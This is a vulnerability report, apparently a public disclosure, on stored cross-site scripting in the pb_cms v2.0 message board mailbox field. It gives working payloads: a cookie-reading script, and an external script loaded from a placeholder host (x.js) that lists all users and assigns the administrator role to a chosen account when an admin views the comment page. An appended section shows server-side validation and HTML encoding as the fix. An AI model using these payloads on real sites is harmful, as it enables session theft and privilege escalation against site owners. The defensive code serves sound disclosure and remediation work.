The message board function in pb_cms v2.0 lets an attacker store malicious XSS code in the mailbox field of a message; the code is then triggered in the administrator's back end.
No account is required.
Open the message board page, insert the malicious XSS code into the mailbox input box, fill in the other fields, and submit.
payload: <script>alert(document.cookie)</script>

When an administrator, or any other role with permission to manage comments, opens the comment management page, the malicious XSS code is triggered:


The same vulnerability can also be used to escalate any account to any role.
Open the message board page, insert the malicious XSS code into the mailbox input box, fill in the other fields, and submit.
payload: <script src="http://xxxxx/x.js"></script>
x.js:
$.post(
    "user/list", {
        pageNumber: 1,
        pageSize: 9999
    },
    function(data) {
        console.log(data);
        for (const index in data.rows) {
            console.log(data.rows[index]);
            console.log(data.rows[index].userId);
            console.log(data.rows[index].username);
            if (data.rows[index].username === 'test') {
                $.post(
                    "user/assign/role", {
                        roleIdStr: 1,
                        userId: data.rows[index].userId
                    });
            }
        }
    }
);
The role of the test account used for testing prior to visiting the Comment Management page:

When an administrator, or any other role with permission to manage comments, opens the comment management page, the malicious XSS code is triggered:


Safety advice:
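The following is an added example, not part of the original report and not pb_cms code: it shows the two controls that close this issue, strict server-side validation of the mailbox field on submission and HTML encoding of every stored field when the comment management page renders it. The function names, the field names (nickname, email, content) and the 2000-character limit are assumptions made for illustration.

```javascript
// Added example: hypothetical helper names, not taken from pb_cms.
const MAILBOX_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/;
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Input side: accept only a plain address in the mailbox field.
function isValidMailbox(value) {
  return typeof value === 'string' && value.length <= 254 && MAILBOX_RE.test(value);
}

// Output side: encode every character that can open a tag or an attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Server-side check when an anonymous visitor submits the message board form.
// The 2000-character content limit is an assumed value.
function validateMessage(form) {
  const errors = [];
  if (!isValidMailbox(form.email)) errors.push('email: not a valid mailbox address');
  if (!form.content || form.content.length > 2000) errors.push('content: empty or too long');
  return { ok: errors.length === 0, errors };
}

// Comment management list: every field is encoded at render time, so rows
// stored before validation existed are also displayed as inert text.
function renderCommentRow(row) {
  const cells = [row.nickname, row.email, row.content].map((v) => `<td>${escapeHtml(v)}</td>`);
  return `<tr>${cells.join('')}</tr>`;
}

// Constructed sample submissions; the two mailbox values are the payloads quoted above.
const samples = [
  { nickname: 'alice', email: 'alice@example.com', content: 'hello' },
  { nickname: 'x', email: '<script>alert(document.cookie)</script>', content: 'hi' },
  { nickname: 'y', email: '<script src="http://xxxxx/x.js"></script>', content: 'hi' },
];

for (const s of samples) {
  console.log(validateMessage(s).ok, renderCommentRow(s));
}
```

Validation alone does not protect rows already in the database, which is why the render-time encoding is applied regardless of what the submit handler accepted.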